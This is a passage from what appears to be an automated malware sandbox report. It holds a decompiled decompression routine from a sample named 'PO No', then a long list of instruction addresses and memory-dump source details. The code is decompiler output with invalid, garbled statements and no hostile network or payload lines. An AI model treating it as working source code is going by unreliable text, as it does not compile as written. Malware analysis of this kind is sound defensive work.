                                                                      									 *(__ebp - 0x58) = __eax;
                                                                      									 *(__ebp - 0x50) = 1;
                                                                      									 *(__ebp - 0x44) = 0;
                                                                      									 *(__ebp - 0x48) = 0;
                                                                      									L112:
                                                                      									__eax =  *(__ebp - 0x40);
                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                      										_t391 = __ebp - 0x2c;
                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                      										__eflags =  *_t391;
                                                                      										goto L119;
                                                                      									}
                                                                      									__eax =  *(__ebp - 0x50);
                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      									__eax =  *(__ebp - 0x58);
                                                                      									__esi = __edi + __eax;
                                                                      									 *(__ebp - 0x54) = __esi;
                                                                      									__ax =  *__esi;
                                                                      									__ecx = __ax & 0x0000ffff;
                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                      										__ecx = 0;
                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                      										__ecx = 1;
                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                      										__ebx = 1;
                                                                      										__ecx =  *(__ebp - 0x48);
                                                                      										__ebx = 1 << __cl;
                                                                      										__ecx = 1 << __cl;
                                                                      										__ebx =  *(__ebp - 0x44);
                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                      										__cx = __ax;
                                                                      										__cx = __ax >> 5;
                                                                      										__eax = __eax - __ecx;
                                                                      										__edi = __edi + 1;
                                                                      										__eflags = __edi;
                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                      										 *__esi = __ax;
                                                                      										 *(__ebp - 0x50) = __edi;
                                                                      									} else {
                                                                      										 *(__ebp - 0x10) = __edx;
                                                                      										0x800 = 0x800 - __ecx;
                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      										 *__esi = __dx;
                                                                      									}
                                                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      										L111:
                                                                      										_t368 = __ebp - 0x48;
                                                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                      										__eflags =  *_t368;
                                                                      										goto L112;
                                                                      									} else {
                                                                      										goto L109;
                                                                      									}
                                                                      								}
                                                                      								__ecx =  *(__ebp - 0xc);
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                      									__ecx =  *(__ebp - 0x10);
                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      									__ebx = __ebx | 0x00000001;
                                                                      									__eflags = __ebx;
                                                                      									 *(__ebp - 0x44) = __ebx;
                                                                      								}
                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      									L101:
                                                                      									_t338 = __ebp - 0x48;
                                                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                      									__eflags =  *_t338;
                                                                      									goto L102;
                                                                      								} else {
                                                                      									goto L99;
                                                                      								}
                                                                      							}
                                                                      							__edx =  *(__ebp - 4);
                                                                      							__eax = __eax - __ebx;
                                                                      							 *(__ebp - 0x40) = __ecx;
                                                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                      							goto L108;
                                                                      						case 0x1a:
                                                                      							L56:
                                                                      							__eflags =  *(__ebp - 0x64);
                                                                      							if( *(__ebp - 0x64) == 0) {
                                                                      								 *(__ebp - 0x88) = 0x1a;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x68);
                                                                      							__al =  *(__ebp - 0x5c);
                                                                      							__edx =  *(__ebp - 8);
                                                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      							 *( *(__ebp - 0x68)) = __al;
                                                                      							__ecx =  *(__ebp - 0x14);
                                                                      							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                      							__eax = __ecx + 1;
                                                                      							__edx = 0;
                                                                      							_t192 = __eax %  *(__ebp - 0x74);
                                                                      							__eax = __eax /  *(__ebp - 0x74);
                                                                      							__edx = _t192;
                                                                      							goto L79;
                                                                      						case 0x1b:
                                                                      							goto L75;
                                                                      						case 0x1c:
                                                                      							while(1) {
                                                                      								L123:
                                                                      								__eflags =  *(__ebp - 0x64);
                                                                      								if( *(__ebp - 0x64) == 0) {
                                                                      									break;
                                                                      								}
                                                                      								__eax =  *(__ebp - 0x14);
                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                      									__eflags = __eax;
                                                                      								}
                                                                      								__edx =  *(__ebp - 8);
                                                                      								__cl =  *(__eax + __edx);
                                                                      								__eax =  *(__ebp - 0x14);
                                                                      								 *(__ebp - 0x5c) = __cl;
                                                                      								 *(__eax + __edx) = __cl;
                                                                      								__eax = __eax + 1;
                                                                      								__edx = 0;
                                                                      								_t414 = __eax %  *(__ebp - 0x74);
                                                                      								__eax = __eax /  *(__ebp - 0x74);
                                                                      								__edx = _t414;
                                                                      								__eax =  *(__ebp - 0x68);
                                                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                      								__eflags =  *(__ebp - 0x30);
                                                                      								 *( *(__ebp - 0x68)) = __cl;
                                                                      								 *(__ebp - 0x14) = _t414;
                                                                      								if( *(__ebp - 0x30) > 0) {
                                                                      									continue;
                                                                      								} else {
                                                                      									goto L80;
                                                                      								}
                                                                      							}
                                                                      							 *(__ebp - 0x88) = 0x1c;
                                                                      							goto L170;
                                                                      					}
                                                                      				}
                                                                      			}













                                                                      0x00000000
                                                                      0x00406e06
                                                                      0x00406e06
                                                                      0x00406e0a
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ed0
                                                                      0x00406db1
                                                                      0x00406db1
                                                                      0x00406db4
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x0040719c
                                                                      0x0040719c
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x00407177
                                                                      0x00407177
                                                                      0x0040717b
                                                                      0x0040732a
                                                                      0x00000000
                                                                      0x0040732a
                                                                      0x00407187
                                                                      0x0040718e
                                                                      0x00407196
                                                                      0x00407199
                                                                      0x00000000
                                                                      0x00407199
                                                                      0x00406e10
                                                                      0x00406e14
                                                                      0x00407355
                                                                      0x00407355
                                                                      0x00407358
                                                                      0x0040735c
                                                                      0x0040735c
                                                                      0x00406e1a
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00406e27
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x00407340
                                                                      0x00407348
                                                                      0x0040734f
                                                                      0x00407351
                                                                      0x00000000
                                                                      0x00407351
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00406e65
                                                                      0x00406e65
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x00406947
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00000000
                                                                      0x00406958
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406961
                                                                      0x00406964
                                                                      0x00406967
                                                                      0x0040696b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406971
                                                                      0x00406974
                                                                      0x00406976
                                                                      0x00406977
                                                                      0x0040697a
                                                                      0x0040697c
                                                                      0x0040697d
                                                                      0x0040697f
                                                                      0x00406982
                                                                      0x00406987
                                                                      0x0040698c
                                                                      0x00406995
                                                                      0x004069a8
                                                                      0x004069ab
                                                                      0x004069b7
                                                                      0x004069df
                                                                      0x004069e1
                                                                      0x004069ef
                                                                      0x004069ef
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069e3
                                                                      0x004069e6
                                                                      0x004069e7
                                                                      0x004069e7
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069bd
                                                                      0x004069c2
                                                                      0x004069c2
                                                                      0x004069cb
                                                                      0x004069d3
                                                                      0x004069d6
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069f9
                                                                      0x004069f9
                                                                      0x004069fd
                                                                      0x004072a9
                                                                      0x00000000
                                                                      0x004072a9
                                                                      0x00406a06
                                                                      0x00406a16
                                                                      0x00406a19
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1f
                                                                      0x00406a23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a25
                                                                      0x00406a2b
                                                                      0x00406a55
                                                                      0x00406a5b
                                                                      0x00406a62
                                                                      0x00000000
                                                                      0x00406a62
                                                                      0x00406a31
                                                                      0x00406a34
                                                                      0x00406a39
                                                                      0x00406a39
                                                                      0x00406a44
                                                                      0x00406a4c
                                                                      0x00406a4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a9a
                                                                      0x00406a9d
                                                                      0x00406aaa
                                                                      0x00406ab2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a69
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x004072b8
                                                                      0x00000000
                                                                      0x004072b8
                                                                      0x00406a79
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8a
                                                                      0x00406a8d
                                                                      0x00406a92
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406aba
                                                                      0x00406abc
                                                                      0x00406abf
                                                                      0x00406b30
                                                                      0x00406b33
                                                                      0x00406b36
                                                                      0x00406b3d
                                                                      0x00406b47
                                                                      0x00000000
                                                                      0x00406b47
                                                                      0x00406ac1
                                                                      0x00406ac5
                                                                      0x00406ac8
                                                                      0x00406aca
                                                                      0x00406acd
                                                                      0x00406ad0
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad7
                                                                      0x00406adc
                                                                      0x00406adf
                                                                      0x00406ae2
                                                                      0x00406ae6
                                                                      0x00406aed
                                                                      0x00406af0
                                                                      0x00406af7
                                                                      0x00406afb
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406b07
                                                                      0x00406b0a
                                                                      0x00406b28
                                                                      0x00406b2a
                                                                      0x00000000
                                                                      0x00406b0c
                                                                      0x00406b0c
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b1a
                                                                      0x00406b1d
                                                                      0x00406b1f
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406d59
                                                                      0x00406d5d
                                                                      0x00406d7b
                                                                      0x00406d7e
                                                                      0x00406d85
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d91
                                                                      0x00406d94
                                                                      0x00406d96
                                                                      0x00406d9d
                                                                      0x00406d9e
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00406da6
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dae
                                                                      0x00000000
                                                                      0x00406dae
                                                                      0x00406d5f
                                                                      0x00406d62
                                                                      0x00406d65
                                                                      0x00406d6f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406dc3
                                                                      0x00406dc7
                                                                      0x00406dea
                                                                      0x00406ded
                                                                      0x00406df0
                                                                      0x00406dfa
                                                                      0x00406dc9
                                                                      0x00406dc9
                                                                      0x00406dcc
                                                                      0x00406dcf
                                                                      0x00406dd2
                                                                      0x00406ddf
                                                                      0x00406de2
                                                                      0x00406de2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e77
                                                                      0x00406e7b
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e88
                                                                      0x00406e92
                                                                      0x00000000
                                                                      0x00406e92
                                                                      0x00406e7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406ea2
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eaf
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406eb2
                                                                      0x00406eb5
                                                                      0x00406eb8
                                                                      0x00406eb8
                                                                      0x00406ebb
                                                                      0x00406ebe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f5e
                                                                      0x00406f5e
                                                                      0x00406f62
                                                                      0x00407300
                                                                      0x00000000
                                                                      0x00407300
                                                                      0x00406f68
                                                                      0x00406f6b
                                                                      0x00406f6e
                                                                      0x00406f72
                                                                      0x00406f75
                                                                      0x00406f7b
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f80
                                                                      0x00406f83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b57
                                                                      0x004072c4
                                                                      0x00000000
                                                                      0x004072c4
                                                                      0x00406b5d
                                                                      0x00406b60
                                                                      0x00406b63
                                                                      0x00406b67
                                                                      0x00406b6a
                                                                      0x00406b70
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b75
                                                                      0x00406b78
                                                                      0x00406b78
                                                                      0x00406b7b
                                                                      0x00406b7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b84
                                                                      0x00406b8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b94
                                                                      0x00406b97
                                                                      0x00406b9a
                                                                      0x00406b9d
                                                                      0x00406ba0
                                                                      0x00406ba1
                                                                      0x00406ba4
                                                                      0x00406ba6
                                                                      0x00406bac
                                                                      0x00406baf
                                                                      0x00406bb2
                                                                      0x00406bb5
                                                                      0x00406bb8
                                                                      0x00406bbb
                                                                      0x00406bbe
                                                                      0x00406bda
                                                                      0x00406bdd
                                                                      0x00406be0
                                                                      0x00406be3
                                                                      0x00406bea
                                                                      0x00406bee
                                                                      0x00406bf0
                                                                      0x00406bf4
                                                                      0x00406bc0
                                                                      0x00406bc0
                                                                      0x00406bc4
                                                                      0x00406bcc
                                                                      0x00406bd1
                                                                      0x00406bd3
                                                                      0x00406bd5
                                                                      0x00406bd5
                                                                      0x00406bf7
                                                                      0x00406bfe
                                                                      0x00406c01
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c0c
                                                                      0x00406c0c
                                                                      0x00406c10
                                                                      0x004072d0
                                                                      0x00000000
                                                                      0x004072d0
                                                                      0x00406c16
                                                                      0x00406c19
                                                                      0x00406c1c
                                                                      0x00406c20
                                                                      0x00406c23
                                                                      0x00406c29
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2e
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c39
                                                                      0x00406c3c
                                                                      0x00406c3f
                                                                      0x00406c42
                                                                      0x00406c45
                                                                      0x00406c48
                                                                      0x00406c4b
                                                                      0x00406c4e
                                                                      0x00406c51
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c6f
                                                                      0x00406c72
                                                                      0x00406c75
                                                                      0x00406c78
                                                                      0x00406c78
                                                                      0x00406c7b
                                                                      0x00406c7f
                                                                      0x00406c81
                                                                      0x00406c59
                                                                      0x00406c59
                                                                      0x00406c61
                                                                      0x00406c66
                                                                      0x00406c68
                                                                      0x00406c6a
                                                                      0x00406c6a
                                                                      0x00406c84
                                                                      0x00406c8b
                                                                      0x00406c8e
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c8e
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cd0
                                                                      0x00406cd0
                                                                      0x00406cd4
                                                                      0x004072dc
                                                                      0x00000000
                                                                      0x004072dc
                                                                      0x00406cda
                                                                      0x00406cdd
                                                                      0x00406ce0
                                                                      0x00406ce4
                                                                      0x00406ce7
                                                                      0x00406ced
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cf2
                                                                      0x00406cf5
                                                                      0x00406cf5
                                                                      0x00406cfb
                                                                      0x00406c99
                                                                      0x00406c99
                                                                      0x00406c9c
                                                                      0x00000000
                                                                      0x00406c9c
                                                                      0x00406cfd
                                                                      0x00406cfd
                                                                      0x00406d00
                                                                      0x00406d03
                                                                      0x00406d06
                                                                      0x00406d09
                                                                      0x00406d0c
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d18
                                                                      0x00406d1b
                                                                      0x00406d33
                                                                      0x00406d36
                                                                      0x00406d39
                                                                      0x00406d3c
                                                                      0x00406d3c
                                                                      0x00406d3f
                                                                      0x00406d43
                                                                      0x00406d45
                                                                      0x00406d1d
                                                                      0x00406d1d
                                                                      0x00406d25
                                                                      0x00406d2a
                                                                      0x00406d2c
                                                                      0x00406d2e
                                                                      0x00406d2e
                                                                      0x00406d48
                                                                      0x00406d4f
                                                                      0x00406d52
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406fe1
                                                                      0x00406fe1
                                                                      0x00406fe5
                                                                      0x0040730c
                                                                      0x00000000
                                                                      0x0040730c
                                                                      0x00406feb
                                                                      0x00406fee
                                                                      0x00406ff1
                                                                      0x00406ff5
                                                                      0x00406ff8
                                                                      0x00406ffe
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407003
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x004070f4
                                                                      0x00407116
                                                                      0x00407119
                                                                      0x00407123
                                                                      0x00000000
                                                                      0x00407123
                                                                      0x004070f6
                                                                      0x004070f9
                                                                      0x004070fd
                                                                      0x00407100
                                                                      0x00407100
                                                                      0x00407103
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071ad
                                                                      0x004071b1
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071d6
                                                                      0x004071dd
                                                                      0x004071e4
                                                                      0x004071e4
                                                                      0x00000000
                                                                      0x004071e4
                                                                      0x004071b3
                                                                      0x004071b6
                                                                      0x004071b9
                                                                      0x004071bc
                                                                      0x004071c3
                                                                      0x00407107
                                                                      0x00407107
                                                                      0x0040710a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040729e
                                                                      0x004072a1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed8
                                                                      0x00406eda
                                                                      0x00406ee1
                                                                      0x00406ee2
                                                                      0x00406ee4
                                                                      0x00406ee7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406eef
                                                                      0x00406ef2
                                                                      0x00406ef5
                                                                      0x00406ef7
                                                                      0x00406ef9
                                                                      0x00406ef9
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f04
                                                                      0x00406f07
                                                                      0x00406f15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071eb
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071fa
                                                                      0x004071fa
                                                                      0x004071fe
                                                                      0x00407336
                                                                      0x00000000
                                                                      0x00407336
                                                                      0x00407204
                                                                      0x00407207
                                                                      0x0040720a
                                                                      0x0040720e
                                                                      0x00407211
                                                                      0x00407217
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x0040721c
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x00407222
                                                                      0x00407222
                                                                      0x00407226
                                                                      0x00407286
                                                                      0x00407289
                                                                      0x0040728e
                                                                      0x0040728f
                                                                      0x00407291
                                                                      0x00407293
                                                                      0x00407296
                                                                      0x00000000
                                                                      0x00407296
                                                                      0x00407228
                                                                      0x0040722e
                                                                      0x00407231
                                                                      0x00407234
                                                                      0x00407237
                                                                      0x0040723a
                                                                      0x0040723d
                                                                      0x00407240
                                                                      0x00407243
                                                                      0x00407246
                                                                      0x00407249
                                                                      0x00407262
                                                                      0x00407265
                                                                      0x00407268
                                                                      0x0040726b
                                                                      0x0040726f
                                                                      0x00407271
                                                                      0x00407271
                                                                      0x00407272
                                                                      0x00407275
                                                                      0x0040724b
                                                                      0x0040724b
                                                                      0x00407253
                                                                      0x00407258
                                                                      0x0040725a
                                                                      0x0040725d
                                                                      0x0040725d
                                                                      0x00407278
                                                                      0x0040727f
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f56
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407089
                                                                      0x00407089
                                                                      0x0040708c
                                                                      0x0040708e
                                                                      0x00407318
                                                                      0x00000000
                                                                      0x00407318
                                                                      0x00407094
                                                                      0x00407097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040709d
                                                                      0x004070a1
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x00000000
                                                                      0x004070a4
                                                                      0x00406f22
                                                                      0x00406f24
                                                                      0x00406f26
                                                                      0x00406f28
                                                                      0x00406f2b
                                                                      0x00406f2c
                                                                      0x00406f2e
                                                                      0x00406f30
                                                                      0x00406f33
                                                                      0x00406f36
                                                                      0x00406f4c
                                                                      0x00406f51
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8d
                                                                      0x00406fb9
                                                                      0x00406fbb
                                                                      0x00406fc2
                                                                      0x00406fc5
                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c9f
                                                                      0x00406c9f
                                                                      0x00406ca3
                                                                      0x004072e8
                                                                      0x00000000
                                                                      0x004072e8
                                                                      0x00406ca9
                                                                      0x00406cac
                                                                      0x00406caf
                                                                      0x00406cb2
                                                                      0x00406cb5
                                                                      0x00406cb8
                                                                      0x00406cbb
                                                                      0x00406cbd
                                                                      0x00406cc0
                                                                      0x00406cc3
                                                                      0x00406cc6
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                      • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
